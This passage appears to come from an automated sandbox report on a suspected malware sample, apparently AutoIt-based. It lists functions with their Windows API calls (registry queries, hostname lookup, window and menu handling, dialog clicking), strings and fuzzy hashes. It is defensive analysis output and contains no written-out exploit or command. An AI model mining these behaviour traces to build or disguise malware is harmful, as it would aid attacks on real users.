                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00BA78D8
                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00BA7902
                                              • CLSIDFromString.COMBASE(?,?), ref: 00BA792A
                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00BA7935
                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00BA793A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                              • API String ID: 1411258926-22481851
                                              • Opcode ID: 916b17238d59ba13935f5bb8eed23e7481f5042c69887a45105ea26357d76778
                                              • Instruction ID: b3352783009413ffa112c7dfdfb65df3c599a1f6bcb94519007a0d58febbcccf
                                              • Opcode Fuzzy Hash: 916b17238d59ba13935f5bb8eed23e7481f5042c69887a45105ea26357d76778
                                              • Instruction Fuzzy Hash: 1B410A72D58229ABCF11EF94EC55EEEB7B8FF04351F0441AAE905A31A1EE345D09CB90
                                              Function 00BD0E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                              Download Yara Rule
                                              APIs
                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BCFDAD,?,?), ref: 00BD0E31
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: BuffCharUpper
                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                              • API String ID: 3964851224-909552448
                                              • Opcode ID: 75492e00ee1c53e0e5146e3ee1fe71281a6244580dc7cb9e244c9d5c65efc30f
                                              • Instruction ID: 0653afebd4caee8befe6c82a60b690ff1ecae0fd086444778eebc74616056b39
                                              • Opcode Fuzzy Hash: 75492e00ee1c53e0e5146e3ee1fe71281a6244580dc7cb9e244c9d5c65efc30f
                                              • Instruction Fuzzy Hash: 23414C7152424A8FCF14FF50D8A6BEE77A4EF21700F6444A6FC651B292EB309D1ACB60
                                              Function 00BAF7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00B8E2A0,00000010,?,Bad directive syntax error,00BDF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00BAF7C2
                                              • LoadStringW.USER32(00000000,?,00B8E2A0,00000010), ref: 00BAF7C9
                                                • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                              • _wprintf.LIBCMT ref: 00BAF7FC
                                              • __swprintf.LIBCMT ref: 00BAF81E
                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00BAF88D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                              • API String ID: 1506413516-4153970271
                                              • Opcode ID: 193bf44c593e42e849101b705d8ff09897830d7eb2ba369d56ec6d4bd158c1d4
                                              • Instruction ID: 5ce6fa01ef5fc9aacdbc701e5832bb83bdd579261ec89f428a9663d04c978cc8
                                              • Opcode Fuzzy Hash: 193bf44c593e42e849101b705d8ff09897830d7eb2ba369d56ec6d4bd158c1d4
                                              • Instruction Fuzzy Hash: BA218D3294421AEBCF12EF90CC5AEFE77B8FF18701F0444E6F915660A2EA319618DB50
                                              Function 00BB52C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
                                                • Part of subcall function 00B57924: _memmove.LIBCMT ref: 00B579AD
                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00BB5330
                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00BB5346
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BB5357
                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00BB5369
                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00BB537A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: SendString$_memmove
                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                              • API String ID: 2279737902-1007645807
                                              • Opcode ID: 2652c725ad4b64ed1e66cf486c44768767e3f41bd0e0fb8a197247cbcecd0c45
                                              • Instruction ID: 7aadb9e0a380cd0c097c76939a7d498d12ea00950aa355dbd11fc8a5da200257
                                              • Opcode Fuzzy Hash: 2652c725ad4b64ed1e66cf486c44768767e3f41bd0e0fb8a197247cbcecd0c45
                                              • Instruction Fuzzy Hash: 9111C430A901297AD720B765DC4AEFFBBFCEB91B41F0004A9B802A20D1EEA00D08C5B5
                                              Function 00BB46B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                              • String ID: 0.0.0.0
                                              • API String ID: 208665112-3771769585
                                              • Opcode ID: 706e3cf7bacc0657c363aac628bebe1a3d8eba3438b9b05a00d26b84e14c3f52
                                              • Instruction ID: fa115367fe49d0bda050ab425e4883147d5ef79e1b1d9c0bd7354b2e53211930
                                              • Opcode Fuzzy Hash: 706e3cf7bacc0657c363aac628bebe1a3d8eba3438b9b05a00d26b84e14c3f52
                                              • Instruction Fuzzy Hash: 9611A135904115ABCB20AB319C46AFA77F8EB02711F0481F6F45A96192FFB18E81C651
                                              Function 00BB4F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • timeGetTime.WINMM ref: 00BB4F7A
                                                • Part of subcall function 00B7049F: timeGetTime.WINMM(?,7694B400,00B60E7B), ref: 00B704A3
                                              • Sleep.KERNEL32(0000000A), ref: 00BB4FA6
                                              • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00BB4FCA
                                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00BB4FEC
                                              • SetActiveWindow.USER32 ref: 00BB500B
                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00BB5019
                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00BB5038
                                              • Sleep.KERNEL32(000000FA), ref: 00BB5043
                                              • IsWindow.USER32 ref: 00BB504F
                                              • EndDialog.USER32(00000000), ref: 00BB5060
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                              • String ID: BUTTON
                                              • API String ID: 1194449130-3405671355
                                              • Opcode ID: a111bc5987ae75a8e56d71c1e5f26328903b812669a82977be51f29a231ea622
                                              • Instruction ID: cb036a3715abc8a16d30c101f69e75f99a370f297fc1303af68f826b578741fb
                                              • Opcode Fuzzy Hash: a111bc5987ae75a8e56d71c1e5f26328903b812669a82977be51f29a231ea622
                                              • Instruction Fuzzy Hash: 0421A47060A606BFE7206F20EC99BBA7BEAFB57745F049065F106831B1DFB18D00C662
                                              Function 00BBD58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
                                                • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
                                              • CoInitialize.OLE32(00000000), ref: 00BBD5EA
                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00BBD67D
                                              • SHGetDesktopFolder.SHELL32(?), ref: 00BBD691
                                              • CoCreateInstance.COMBASE(00BE2D7C,00000000,00000001,00C08C1C,?), ref: 00BBD6DD
                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00BBD74C
                                              • CoTaskMemFree.COMBASE(?), ref: 00BBD7A4
                                              • _memset.LIBCMT ref: 00BBD7E1
                                              • SHBrowseForFolderW.SHELL32(?), ref: 00BBD81D
                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00BBD840
                                              • CoTaskMemFree.COMBASE(00000000), ref: 00BBD847
                                              • CoTaskMemFree.COMBASE(00000000), ref: 00BBD87E
                                              • CoUninitialize.COMBASE ref: 00BBD880
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                              • String ID:
                                              • API String ID: 1246142700-0
                                              • Opcode ID: 7e4e027c7fec56acd8592e3886ac65293fd9edfbc645ec94bd048a8429cdd8c2
                                              • Instruction ID: 91660e0d525a9f5140464eb1dc15583267e9ca1d5f502f3a0e23e90fca5e12a6
                                              • Opcode Fuzzy Hash: 7e4e027c7fec56acd8592e3886ac65293fd9edfbc645ec94bd048a8429cdd8c2
                                              • Instruction Fuzzy Hash: 69B10B75A00109EFDB04DFA4C894EAEBBF9FF49304B1484A9E90ADB261DB74ED45CB50
                                              Function 00BAC267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDlgItem.USER32(?,00000001), ref: 00BAC283
                                              • GetWindowRect.USER32(00000000,?), ref: 00BAC295
                                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00BAC2F3
                                              • GetDlgItem.USER32(?,00000002), ref: 00BAC2FE
                                              • GetWindowRect.USER32(00000000,?), ref: 00BAC310
                                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00BAC364
                                              • GetDlgItem.USER32(?,000003E9), ref: 00BAC372
                                              • GetWindowRect.USER32(00000000,?), ref: 00BAC383
                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00BAC3C6
                                              • GetDlgItem.USER32(?,000003EA), ref: 00BAC3D4
                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00BAC3F1
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00BAC3FE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Window$ItemMoveRect$Invalidate
                                              • String ID:
                                              • API String ID: 3096461208-0
                                              • Opcode ID: c49c7284b9fb677a9b5ef7c22569ccde396626488a8fa162fc298584f38ac0a2
                                              • Instruction ID: b0c70ba9592c5390f16ff806ea708c348c804bac766d7e55a22683940cdced0b
                                              • Opcode Fuzzy Hash: c49c7284b9fb677a9b5ef7c22569ccde396626488a8fa162fc298584f38ac0a2
                                              • Instruction Fuzzy Hash: E2513E71B04205ABDF18CFA9DD99AAEBBF6EB88310F14816DF516D7290DB709D00CB10
                                              Function 00B521A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B525DB: GetWindowLongW.USER32(?,000000EB), ref: 00B525EC
                                              • GetSysColor.USER32(0000000F), ref: 00B521D3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ColorLongWindow
                                              • String ID:
                                              • API String ID: 259745315-0
                                              • Opcode ID: e0ff6c919ffadc0ce241e79c9615dc38dd1ea40d68c09c1124b2d483a5f5ff81
                                              • Instruction ID: da9e0770cee454b2aa1f6ca3cf508f0e0d2c0f77f83b7ee333b67642ebedd1a2
                                              • Opcode Fuzzy Hash: e0ff6c919ffadc0ce241e79c9615dc38dd1ea40d68c09c1124b2d483a5f5ff81
                                              • Instruction Fuzzy Hash: BF41A335006540DEDB215F28EC98BB93BA5EB07322F1442E6FD659B1E1DB328C46DB11
                                              Function 00BBA8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                              Download Yara Rule
                                              APIs
                                              • CharLowerBuffW.USER32(?,?,00BDF910), ref: 00BBA90B
                                              • GetDriveTypeW.KERNEL32(00000061,00C089A0,00000061), ref: 00BBA9D5
                                              • _wcscpy.LIBCMT ref: 00BBA9FF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: BuffCharDriveLowerType_wcscpy
                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                              • API String ID: 2820617543-1000479233
                                              • Opcode ID: 15e91e9ec46207c39ddd817e80db763b12729b370c9927048c906aee3ac890aa
                                              • Instruction ID: 1a3ec61e54c088f21d70bcd3b0b33f04df75c22ada0c9956bb5e894337afa009
                                              • Opcode Fuzzy Hash: 15e91e9ec46207c39ddd817e80db763b12729b370c9927048c906aee3ac890aa
                                              • Instruction Fuzzy Hash: 06519A319183019FC710EF14C892ABEB7E5EF94740F5488AEF896572A2DBB19909CA53
                                              Function 00B59837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: __i64tow__itow__swprintf
                                              • String ID: %.15g$0x%p$False$True
                                              • API String ID: 421087845-2263619337
                                              • Opcode ID: f75dcdcda3c826bfb5e9838b576a348ac16a80283e29ade676a475b98f86a0e7
                                              • Instruction ID: 041f304e7c98a297dec2dfd0fc52e30dba6d9ad75f7269b44748f8b74e5d7ef2
                                              • Opcode Fuzzy Hash: f75dcdcda3c826bfb5e9838b576a348ac16a80283e29ade676a475b98f86a0e7
                                              • Instruction Fuzzy Hash: CE41D671614206EFDB24EF74D882BBA73E8EF15300F2484FEE959D7291EA319946CB10
                                              Function 00BD7152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00BD716A
                                              • CreateMenu.USER32 ref: 00BD7185
                                              • SetMenu.USER32(?,00000000), ref: 00BD7194
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BD7221
                                              • IsMenu.USER32(?), ref: 00BD7237
                                              • CreatePopupMenu.USER32 ref: 00BD7241
                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00BD726E
                                              • DrawMenuBar.USER32 ref: 00BD7276
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                              • String ID: 0$F
                                              • API String ID: 176399719-3044882817
                                              • Opcode ID: 3048c031edbcbf26977b481ec1e99559d9560d49fcec0b5bd441136a24b265aa
                                              • Instruction ID: 36f2face16ecb11fc6e2fc637b16d71ba031e5169cc7b50adb4c454659f81302
                                              • Opcode Fuzzy Hash: 3048c031edbcbf26977b481ec1e99559d9560d49fcec0b5bd441136a24b265aa
                                              • Instruction Fuzzy Hash: 27412874A05205EFDB14DF64D884BEABBF5FF4A350F1441AAF905A7351EB31A910CB90
                                              Function 00BD74BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00BD755E
                                              • CreateCompatibleDC.GDI32(00000000), ref: 00BD7565
                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00BD7578
                                              • SelectObject.GDI32(00000000,00000000), ref: 00BD7580
                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 00BD758B
                                              • DeleteDC.GDI32(00000000), ref: 00BD7594
                                              • GetWindowLongW.USER32(?,000000EC), ref: 00BD759E
                                              • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00BD75B2
                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00BD75BE
                                              Strings
                                              Memory Dump Source
